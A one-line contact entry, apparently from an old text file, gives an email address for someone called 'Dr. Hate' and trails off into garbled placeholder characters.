dhate@basenet.net....................................To contact Dr. Hate ������������������������������������������������������������������������������